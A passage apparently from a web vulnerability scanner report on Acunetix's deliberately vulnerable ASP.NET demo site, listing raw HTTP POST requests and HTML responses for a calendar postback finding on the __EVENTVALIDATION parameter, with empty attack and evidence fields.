href="javascript:__doPostBack('RightPanel1$Calendar','8181')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8182')" style="color:Black" title="May 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8183')" style="color:Black" title="May 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1135 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,135 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8442&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgDAKevCC9sIZGRkW7fUD4kV66zHIpLWH2wCfUQ1x3Q%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwK3s9jMDwLQp5LlBALTp%2BrACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna%2F1AgLmna%2F1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ%2FmBQLmnZ%2FmBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY%2FcDALmnY%2FcDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE%2FAvukoT8C%2B6TV0wkC%2B6TV0wkC%2B6TJ9gIC%2B6TJ9gIC%2B6T9jQoC%2B6T9jQoC%2B6SRoAMC%2B6SRoAMC%2B6SFxwwC%2B6SFxwwC%2B6T5rAkC%2B6T5rAkC%2B6TtwwIC%2B6TtwwIC3Mv%2F6AUC3Mv%2F6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7%2BQ8C3Mu7%2BQ8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6%2BoCAtzL6%2BoCAtzL39MPAtzL39MPAtzL8%2FYIAtzL8%2FYIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBYn6ihdUtSt4iMO9fGV7U5tf%2FjtG
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:19:04 GMT Content-Length: 12583
Response Body - size: 12,583 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgDAKevCC9sIZGRkW7fUD4kV66zHIpLWH2wCfUQ1x3Q=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK3s9jMDwLQp5LlBALTp+rACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna/1AgLmna/1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ/mBQLmnZ/mBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY/cDALmnY/cDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE/AvukoT8C+6TV0wkC+6TV0wkC+6TJ9gIC+6TJ9gIC+6T9jQoC+6T9jQoC+6SRoAMC+6SRoAMC+6SFxwwC+6SFxwwC+6T5rAkC+6T5rAkC+6TtwwIC+6TtwwIC3Mv/6AUC3Mv/6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7+Q8C3Mu7+Q8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6+oCAtzL6+oCAtzL39MPAtzL39MPAtzL8/YIAtzL8/YIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBYn6ihdUtSt4iMO9fGV7U5tf/jtG" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">February 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8436')" style="color:Black" title="February 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8437')" style="color:Black" title="February 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8438')" style="color:Black" title="February 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8439')" style="color:Black" title="February 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8440')" style="color:Black" title="February 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8441')" style="color:Black" title="February 10">10</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8442')" style="color:White" title="February 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8443')" style="color:Black" title="February 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8444')" style="color:Black" title="February 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8445')" style="color:Black" title="February 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8446')" style="color:Black" title="February 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8447')" style="color:Black" title="February 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8448')" style="color:Black" title="February 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8449')" style="color:Black" title="February 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8450')" style="color:Black" title="February 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8451')" style="color:Black" title="February 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8452')" style="color:Black" title="February 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8453')" style="color:Black" title="February 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8454')" style="color:Black" title="February 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8455')" style="color:Black" title="February 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8456')" style="color:Black" title="February 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1107 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,107 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8462&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgDAbDt6G9sIZGRkRUKOmOvURr2LrVMnR50X57D6rvQ%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwK3w57tDQLRp67yDgLQp%2BbjBwLcy%2BvqAgLcy%2BvqAgLcy9%2FTDwLcy9%2FTDwLcy%2FP2CALcy%2FP2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK%2BaMFAor5owUCivnX2QkCivnX2QkCivnL%2FAICivnL%2FAICivn%2FkwoCivn%2FkwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O%2F1QMCv5O%2F1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJ1kHVnieRPARatokydrOkcOOgu4E%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:59:05 GMT Content-Length: 12504
Response Body - size: 12,504 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgDAbDt6G9sIZGRkRUKOmOvURr2LrVMnR50X57D6rvQ=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK3w57tDQLRp67yDgLQp+bjBwLcy+vqAgLcy+vqAgLcy9/TDwLcy9/TDwLcy/P2CALcy/P2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK+aMFAor5owUCivnX2QkCivnX2QkCivnL/AICivnL/AICivn/kwoCivn/kwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O/1QMCv5O/1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJ1kHVnieRPARatokydrOkcOOgu4E=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">March 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:White" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8471')" style="color:Black" title="March 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8472')" style="color:Black" title="March 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8473')" style="color:Black" title="March 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8474')" style="color:Black" title="March 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8475')" style="color:Black" title="March 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8476')" style="color:Black" title="March 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8477')" style="color:Black" title="March 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8478')" style="color:Black" title="March 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8479')" style="color:Black" title="March 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8480')" style="color:Black" title="March 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8481')" style="color:Black" title="March 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8482')" style="color:Black" title="March 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8483')" style="color:Black" title="March 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8484')" style="color:Black" title="March 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a 